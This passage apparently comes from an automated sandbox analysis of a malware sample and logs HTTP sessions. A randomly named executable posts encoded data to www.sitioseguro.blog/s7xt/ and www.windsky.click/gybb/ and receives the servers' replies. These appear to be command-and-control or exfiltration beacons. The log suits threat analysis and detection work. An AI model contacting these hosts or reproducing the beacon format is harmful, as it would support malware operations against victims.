                                                                Data Ascii: -Jkp4f=HKwmnw8C74mvA+p9z1iCY1V1UgdybW9maJmexcRt5A2bu5bvDTjBuP0o5j00DljqSmWNux5dAeu4nWPLuH7RyVJJkKCl5rNLyStxlsDILiDX/7i4oo+b1YR8zsOoJWnm5XGVqji2xGGhy5vUi1JX9u6tfAT3rU4VOMPGEas0RG6MuoE+r3yphIrsov9LY2jPcYgtPLGNssETmcLImg==
                                                                Jan 11, 2025 05:11:24.152702093 CET951INHTTP/1.1 405 Not Allowed
                                                                Date: Sat, 11 Jan 2025 04:11:24 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U22gtAMNhx8Q0cpKwgu%2Be7xs5zOhzAeEU5hTBK7AmBxfbzGoc8PpEgPm1mhQ42ZO2JsD63KvzNgDkF1RuBRGCSg4pmo%2F48b1%2Fe0LLBw0MnTQmKAZnkfwRasHsXp%2BEvKwouL1lmsdeQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 900210030878430a-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2073&min_rtt=2073&rtt_var=1036&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=717&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 39 64 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 9d<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                18192.168.2.749994104.21.15.10080360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:11:26.146740913 CET737OUTPOST /s7xt/ HTTP/1.1
                                                                Host: www.sitioseguro.blog
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.sitioseguro.blog
                                                                Content-Length: 239
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.sitioseguro.blog/s7xt/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Raw: 2d 4a 6b 70 34 66 3d 48 4b 77 6d 6e 77 38 43 37 34 6d 76 41 66 5a 39 31 55 69 43 64 56 56 32 49 77 64 79 52 32 39 36 61 4a 36 65 78 64 45 77 35 79 53 62 75 59 72 76 43 52 48 42 76 50 30 6f 68 54 31 38 65 31 6a 6a 53 6d 61 76 75 77 46 64 41 65 4b 34 6e 54 4c 4c 75 55 54 51 30 46 4a 48 38 36 43 6e 33 4c 4e 4c 79 53 74 78 6c 73 58 79 4c 69 37 58 2f 4f 79 34 79 4a 2b 63 70 6f 52 2f 30 73 4f 6f 44 47 6e 71 35 58 47 7a 71 6d 43 63 78 45 4f 68 79 34 66 55 69 6b 4a 55 7a 75 36 72 63 77 53 4f 72 42 49 66 41 5a 76 5a 4d 4a 55 6f 58 6e 32 4c 6d 2b 46 63 78 56 2b 46 2f 5a 54 58 73 74 5a 39 50 51 2b 36 65 5a 6b 31 43 70 79 73 7a 62 68 35 72 4f 71 4d 77 52 5a 6f 6f 66 63 34 63 56 66 44 68 37 4a 35 33 68 6e 30 73 39 51 3d
                                                                Data Ascii: -Jkp4f=HKwmnw8C74mvAfZ91UiCdVV2IwdyR296aJ6exdEw5ySbuYrvCRHBvP0ohT18e1jjSmavuwFdAeK4nTLLuUTQ0FJH86Cn3LNLyStxlsXyLi7X/Oy4yJ+cpoR/0sOoDGnq5XGzqmCcxEOhy4fUikJUzu6rcwSOrBIfAZvZMJUoXn2Lm+FcxV+F/ZTXstZ9PQ+6eZk1Cpyszbh5rOqMwRZoofc4cVfDh7J53hn0s9Q=


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                19192.168.2.749995104.21.15.10080360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:11:28.692279100 CET1750OUTPOST /s7xt/ HTTP/1.1
                                                                Host: www.sitioseguro.blog
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.sitioseguro.blog
                                                                Content-Length: 1251
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.sitioseguro.blog/s7xt/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Raw: 2d 4a 6b 70 34 66 3d 48 4b 77 6d 6e 77 38 43 37 34 6d 76 41 66 5a 39 31 55 69 43 64 56 56 32 49 77 64 79 52 32 39 36 61 4a 36 65 78 64 45 77 35 79 61 62 74 71 7a 76 44 78 37 42 2b 2f 30 6f 73 7a 31 39 65 31 69 6a 53 6d 53 72 75 77 49 6f 41 63 69 34 68 78 44 4c 2b 31 54 51 36 46 4a 48 31 61 43 6d 35 72 4e 37 79 57 4a 31 6c 73 48 79 4c 69 37 58 2f 50 43 34 38 49 2b 63 36 34 52 38 7a 73 50 6e 4a 57 6e 47 35 58 50 47 71 6d 50 72 78 30 75 68 7a 59 50 55 67 57 68 55 2f 75 36 70 5a 77 53 2f 72 42 4e 46 41 5a 62 6a 4d 49 77 53 58 6c 6d 4c 6c 4a 67 77 6b 32 37 59 6a 4c 48 73 6f 4f 64 61 41 44 79 58 58 62 6c 49 4c 75 6d 6f 7a 72 74 64 74 2f 53 52 35 52 55 56 34 5a 38 39 54 45 4c 37 78 71 4a 39 71 52 71 2f 31 37 34 7a 33 4f 37 67 67 6f 39 4c 56 55 48 7a 77 62 64 34 74 7a 73 33 66 35 58 51 73 78 2f 4d 65 7a 71 67 6a 74 73 6a 45 73 6e 4b 48 36 73 6a 47 50 4e 38 61 4e 35 2f 75 72 33 77 37 32 30 45 7a 62 64 46 43 39 59 6b 54 77 43 65 4d 5a 66 6e 5a 75 58 50 6f 6d 55 31 79 4c 74 32 75 53 74 57 38 2b 61 79 47 4f 51 [TRUNCATED]
                                                                Data Ascii: -Jkp4f=HKwmnw8C74mvAfZ91UiCdVV2IwdyR296aJ6exdEw5yabtqzvDx7B+/0osz19e1ijSmSruwIoAci4hxDL+1TQ6FJH1aCm5rN7yWJ1lsHyLi7X/PC48I+c64R8zsPnJWnG5XPGqmPrx0uhzYPUgWhU/u6pZwS/rBNFAZbjMIwSXlmLlJgwk27YjLHsoOdaADyXXblILumozrtdt/SR5RUV4Z89TEL7xqJ9qRq/174z3O7ggo9LVUHzwbd4tzs3f5XQsx/MezqgjtsjEsnKH6sjGPN8aN5/ur3w720EzbdFC9YkTwCeMZfnZuXPomU1yLt2uStW8+ayGOQUw/+O6l2oTRZXwHnx/0I2Q4zEz0sPh4mt5auqMrIE6vJtOZHm8pfU0zlUC6BApk9wlOBn0Hrxtco4sID12ZV+5+sdZpvyXszvRQgL3ssBU+eUgdXCfZ+iMipjIsFbM4yAONeoovwjabLCv/tIyy4/jAH0sp1GYY/Is9Qk0wzsHQfM/MKLPSb7p0v6iqHaiJj/Syx5bO7OFF8atj1nr0UCmo4O0wR5/ahBUiaUiZEXaEwBa+S1E99iiKxLll7yUyl8NVxjl3butX1xQEVVgYqTImyJXY8/+QKDoRRJwkmTO6ner9msfuad1EXhlqDBl/Lp6qUGdQ7cICGU8XKScSQCSDQVRX0b7k4F+7h/yQixA+6i0j7HY2FxV7oSN0zoFHQi0K5ci9i242BfKuqCIvDi+Efz7CjC6+fuN6NXVkC8S8eiqhjSrLonhi5p97ThNm5wm6H5MkHR7QoK2w6PFC0fyHTSzU2G1lHWRhHSgST0tGZ24DIf/ccbCf9eHT5nZ0957riVLxbw3AYoveVarx/z/90j+OssvjSUy15IhVE8h3ObJOyJFRNVOLMls161YXCqR+dq+CY+1eSw+/zHITRhaEKDj+a3uK3w30e9vWZi+hRDw7kVdIIMA0rn7i5JqqbdlHL/Z+viDjSMv/R0oCO6gtnaPvC+Az7F/ [TRUNCATED]
                                                                Jan 11, 2025 05:11:29.288331985 CET951INHTTP/1.1 405 Not Allowed
                                                                Date: Sat, 11 Jan 2025 04:11:29 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fmHn8zqOxDsjP7lI1ETaxekvrlRVKbK%2FkzkRQTbklP0yCzkurM2gDcr%2FTUeK%2Bt%2BD856LKCdrMyF6Lyl6XFbK3Akiaveb7zB4XKx71cxTW6X0YMDvjuteyrBSl8h3k1D4cKrK2bvFjQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 90021022e9f80f78-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1485&min_rtt=1485&rtt_var=742&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1750&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 39 64 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 9d<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                20192.168.2.749996104.21.15.10080360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:11:31.234817028 CET453OUTGET /s7xt/?-Jkp4f=KIYGkFEpkLb5U9Z0/G2nYgR5FDZ6UiRQBMLs0+U/kh62mYb3aiLe2OdUmDxpEW63W2KDnmcIAZHjnyCR3mqA6U5k7peC8KRmsRBR08PWB1at1OCwwLT81ahb8amXGnyuxVS1phW32kmk&SVjx=u6ApldVh4TiTWl HTTP/1.1
                                                                Host: www.sitioseguro.blog
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Language: en-US,en;q=0.9
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Jan 11, 2025 05:11:31.784411907 CET857INHTTP/1.1 200 OK
                                                                Date: Sat, 11 Jan 2025 04:11:31 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                                                Accept-Ranges: bytes
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d%2FWnW6es3%2FSLwt3yN2hJFMGfDCbULgH%2FfX%2BooAB%2FfZ%2Fw%2FQrNtzCoTUgtRpsNf%2Fvp2qiHvPJZo1tjM0AHDsEqIA%2FEW6JNHmjOuZPLwTxIRacF%2BNIo3R2%2BFc7aw%2BORKoWocFGOlgYwrw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 90021032ce114401-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1549&min_rtt=1549&rtt_var=774&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=453&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Jan 11, 2025 05:11:31.784923077 CET1236INData Raw: 32 64 61 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61
                                                                Data Ascii: 2dad<!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robo
                                                                Jan 11, 2025 05:11:31.784935951 CET1236INData Raw: 63 68 61 69 6e 69 6e 67 3a 6e 6f 6e 65 3b 6f 76 65 72 73 63 72 6f 6c 6c 2d 62 65 68 61 76 69 6f 72 3a 6e 6f 6e 65 7d 2e 77 72 61 70 70 65 72 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6f 76 65 72 66
                                                                Data Ascii: chaining:none;overscroll-behavior:none}.wrapper{min-height:100%;display:flex;overflow:hidden}@supports (overflow:clip){.wrapper{overflow:clip}}.wrapper>main{flex:1 1 auto}.wrapper>*{min-width:0}.main{display:flex;align-items:center;justify-con
                                                                Jan 11, 2025 05:11:31.784976006 CET448INData Raw: 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 2e 30 36 32 35 72
                                                                Data Ascii: ;justify-content:center;align-items:center;text-align:center;border-radius:1.0625rem;font-weight:500;padding:.375rem .8125rem}@media (min-width:45.625em){.window-main__actions,.window-main__body{margin-top:1.875rem}.window-main{padding:3.75rem
                                                                Jan 11, 2025 05:11:31.784986019 CET1236INData Raw: 37 35 72 65 6d 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 32 30 65 6d 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 6e 67 3a 31 2e 35 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 74 69 74 6c 65 7b 66 6f 6e
                                                                Data Ascii: 75rem}}@media (max-width:20em){.window-main{padding:1.5rem}.window-main__title{font-size:1.5rem}.window-main__body{margin-top:1.5rem;font-size:.875rem}.window-main__info{margin-bottom:1.5rem}.window-main__list{padding-left:.5625rem}.window-mai
                                                                Jan 11, 2025 05:11:31.784996986 CET1236INData Raw: 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 2d 2e 32 35 36 30 39 37 35 36 31 72 65 6d 20 2b 20 38 2e 37 38 30 34 38 37 38 30 34 39 76 77 20 2c 33 2e 37 35 72 65 6d 29 7d 7d 40 73 75 70 70
                                                                Data Ascii: ow-main{padding-top:clamp(1.5rem ,-.256097561rem + 8.7804878049vw ,3.75rem)}}@supports not (padding-top:clamp(1.5rem ,-0.256097561rem + 8.7804878049vw ,3.75rem)){.window-main{padding-top:calc(1.5rem + 2.25*(100vw - 20rem)/ 25.625)}}@supports (
                                                                Jan 11, 2025 05:11:31.785003901 CET1236INData Raw: 2d 62 6f 74 74 6f 6d 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 31 2e 32 30 37 33 31 37 30 37 33 32 72 65 6d 20 2b 20 31 2e 34 36 33 34 31 34 36 33 34 31 76 77 20 2c 31 2e 38 37 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 69
                                                                Data Ascii: -bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__info{margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)}}@supports not (margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875re
                                                                Jan 11, 2025 05:11:31.785022974 CET1236INData Raw: 31 2e 32 30 37 33 31 37 30 37 33 32 72 65 6d 20 2b 20 31 2e 34 36 33 34 31 34 36 33 34 31 76 77 20 2c 31 2e 38 37 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 61 63 74 69 6f 6e 73 2c 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 62
                                                                Data Ascii: 1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__actions,.window-main__body{margin-top:calc(1.5rem + .375*(100vw - 20rem)/ 25.625)}}}a{transition: all 0.4s; background-color: #0E0F14;}a:hover{border: 2px solid #333A48;}</style></h
                                                                Jan 11, 2025 05:11:31.785034895 CET1236INData Raw: 35 36 20 33 37 38 2e 30 36 37 20 33 35 33 2e 37 38 36 43 33 35 31 2e 34 30 35 20 34 30 39 2e 33 31 37 20 32 39 39 2e 38 34 31 20 34 33 39 2e 39 35 33 20 32 36 32 2e 38 39 36 20 34 32 32 2e 32 31 34 5a 22 20 66 69 6c 6c 3d 22 23 30 31 33 46 39 33
                                                                Data Ascii: 56 378.067 353.786C351.405 409.317 299.841 439.953 262.896 422.214Z" fill="#013F93" /></g><defs><filter id="filter0_f_2001_5" x="0.329773" y="0.914673" width="629.662" height="810.506" filterUnits="userSpaceOnUse" color-i
                                                                Jan 11, 2025 05:11:31.785044909 CET1236INData Raw: 67 72 6f 75 6e 64 49 6d 61 67 65 46 69 78 22 20 72 65 73 75 6c 74 3d 22 73 68 61 70 65 22 20 2f 3e 0a 09 09 09 09 09 09 09 09 3c 66 65 47 61 75 73 73 69 61 6e 42 6c 75 72 20 73 74 64 44 65 76 69 61 74 69 6f 6e 3d 22 39 30 22 20 72 65 73 75 6c 74
                                                                Data Ascii: groundImageFix" result="shape" /><feGaussianBlur stdDeviation="90" result="effect1_foregroundBlur_2001_5" /></filter></defs></svg><h1 class="window-main__title">Why am I seeing this page?</h1><div cla
                                                                Jan 11, 2025 05:11:31.796931982 CET1236INData Raw: 31 33 34 2e 32 39 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 6d 61 74 72 69 78 28 2d 30 2e 39 31 36 33 36 36 20 30 2e 34 30 30 33 34 31 20 2d 30 2e 31 35 30 37 31 20 2d 30 2e 39 38 38 35 37 38 20 33 37 39 2e 31 38 33 20 35 38 36 2e 35 37 37 29 22
                                                                Data Ascii: 134.299" transform="matrix(-0.916366 0.400341 -0.15071 -0.988578 379.183 586.577)" fill="#15B1F9" /></g><g opacity="0.8" filter="url(#filter1_f_2001_10)"><path d="M259.743 638.552C361.981 428.888 159.058 467.039 218.34 34


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                21192.168.2.74999746.253.5.22180360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:11:36.849097967 CET708OUTPOST /gybb/ HTTP/1.1
                                                                Host: www.windsky.click
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.windsky.click
                                                                Content-Length: 219
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.windsky.click/gybb/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Raw: 2d 4a 6b 70 34 66 3d 73 43 63 55 73 46 35 56 6c 57 68 58 4d 59 31 58 6d 6c 38 57 31 31 30 69 6b 47 39 69 59 74 2b 6c 53 4d 74 36 43 33 74 39 74 46 66 4a 55 7a 6d 7a 41 52 4c 30 48 78 34 48 4c 2b 4f 69 5a 43 76 50 71 69 52 30 73 58 35 7a 38 4a 73 4b 4a 49 48 55 32 58 73 64 31 66 6b 43 58 6e 64 55 71 49 61 53 6f 37 58 65 6b 79 56 59 66 6d 72 38 55 32 74 6b 4a 33 4e 50 4a 78 77 43 37 4b 61 4a 51 54 6a 2f 79 72 52 56 4f 33 44 36 4f 64 5a 61 41 58 4d 33 2f 73 61 46 4c 68 38 45 48 54 6b 72 42 63 4c 47 44 79 76 4c 52 4b 72 42 69 6f 43 4b 6d 76 66 36 61 58 67 54 41 45 67 62 4b 59 75 67 49 51 77 71 71 44 65 42 75 75 61 33 48 34 2b 6e 6f 34 51 67 4c 41 3d 3d
                                                                Data Ascii: -Jkp4f=sCcUsF5VlWhXMY1Xml8W110ikG9iYt+lSMt6C3t9tFfJUzmzARL0Hx4HL+OiZCvPqiR0sX5z8JsKJIHU2Xsd1fkCXndUqIaSo7XekyVYfmr8U2tkJ3NPJxwC7KaJQTj/yrRVO3D6OdZaAXM3/saFLh8EHTkrBcLGDyvLRKrBioCKmvf6aXgTAEgbKYugIQwqqDeBuua3H4+no4QgLA==
                                                                Jan 11, 2025 05:11:37.668147087 CET774INHTTP/1.1 200 OK
                                                                Server: openresty
                                                                Date: Sat, 11 Jan 2025 04:11:37 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                Content-Language: en
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Referrer-Policy: origin-when-cross-origin
                                                                X-XSS-Protection: 1; mode=block
                                                                Expect-CT: enforce; max-age=3600
                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                Strict-Transport-Security: max-age=63072000
                                                                Content-Encoding: gzip
                                                                Data Raw: 31 30 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 51 31 52 c3 30 10 ec 79 c5 a1 1a 3b b8 a3 88 d2 10 e8 18 52 84 82 f2 22 2f f6 4d 64 99 f1 1d f1 e4 f7 28 09 99 24 1e d4 ed 4a bb da bd 23 3a 9d f9 fd f2 fd 79 fd b9 7a a1 d6 ba b8 b8 a3 33 7f 80 14 39 35 de 21 b9 eb 0b 70 7d 81 47 aa 83 31 85 96 07 85 79 f7 b1 7e 2d 9e dc 7f 4f 12 77 f0 6e 27 18 bf fb c1 1c 85 3e 19 52 96 8c 52 5b eb 6b ec 24 a0 38 82 07 92 24 26 1c 0b 0d 1c e1 ab f2 71 6a 19 25 6d 69 40 f4 4e 6d 1f a1 2d 90 3d db 01 5f 67 a6 0c aa 53 95 89 45 2c de 58 8c 53 00 75 50 e5 06 f3 d9 89 bf d4 9c dd f6 9c 6f fa 7a 3f b1 aa 65 47 21 b2 aa 77 1d cb a1 ca c1 b2 f8 b3 9c 7c 7c 9a 5d b5 58 b7 a0 11 1b 15 03 89 d2 4f aa 31 34 bd a4 86 ae 3c 4a 5a 45 b0 22 4f a8 03 6d 38 6c f3 2a 0c 43 99 63 55 93 14 b3 1c e3 3a f7 6d d0 2c b8 d9 eb 2f b4 74 8c 33 f8 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 10dmQ1R0y;R"/Md($J#:yz395!p}G1y~-Own'>RR[k$8$&qj%mi@Nm-=_gSE,XSuPoz?eG!w||]XO14<JZE"Om8l*CcU:m,/t30


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                22192.168.2.74999846.253.5.22180360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:11:39.396920919 CET728OUTPOST /gybb/ HTTP/1.1
                                                                Host: www.windsky.click
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.windsky.click
                                                                Content-Length: 239
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.windsky.click/gybb/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Raw: 2d 4a 6b 70 34 66 3d 73 43 63 55 73 46 35 56 6c 57 68 58 4e 38 4a 58 67 47 55 57 30 56 30 6c 6e 47 39 69 53 4e 2b 70 53 4d 70 36 43 79 4e 74 75 32 72 4a 52 6d 43 7a 42 53 54 30 4c 52 34 48 54 75 4f 6e 58 69 76 55 71 69 64 43 73 57 31 7a 38 4a 34 4b 4a 49 33 55 31 6d 73 65 36 76 6b 4d 62 48 64 57 33 59 61 53 6f 37 58 65 6b 32 39 6d 66 6d 7a 38 55 44 39 6b 4b 57 4e 49 57 42 77 64 38 4b 61 4a 47 6a 6a 7a 79 72 52 33 4f 79 72 41 4f 66 52 61 41 53 77 33 78 64 61 45 43 68 38 43 4b 7a 6c 70 46 2f 36 72 50 44 2f 78 57 6f 71 59 76 70 53 54 71 35 65 59 41 31 73 2f 65 56 59 67 4f 61 4b 57 66 32 74 66 6f 43 61 5a 6a 4d 75 57 59 50 62 4e 6c 71 78 6b 64 30 48 41 52 37 67 43 68 43 54 4b 67 4b 47 33 77 71 2f 42 75 79 4d 3d
                                                                Data Ascii: -Jkp4f=sCcUsF5VlWhXN8JXgGUW0V0lnG9iSN+pSMp6CyNtu2rJRmCzBST0LR4HTuOnXivUqidCsW1z8J4KJI3U1mse6vkMbHdW3YaSo7Xek29mfmz8UD9kKWNIWBwd8KaJGjjzyrR3OyrAOfRaASw3xdaECh8CKzlpF/6rPD/xWoqYvpSTq5eYA1s/eVYgOaKWf2tfoCaZjMuWYPbNlqxkd0HAR7gChCTKgKG3wq/BuyM=
                                                                Jan 11, 2025 05:11:40.201736927 CET774INHTTP/1.1 200 OK
                                                                Server: openresty
                                                                Date: Sat, 11 Jan 2025 04:11:40 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                Content-Language: en
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Referrer-Policy: origin-when-cross-origin
                                                                X-XSS-Protection: 1; mode=block
                                                                Expect-CT: enforce; max-age=3600
                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                Strict-Transport-Security: max-age=63072000
                                                                Content-Encoding: gzip
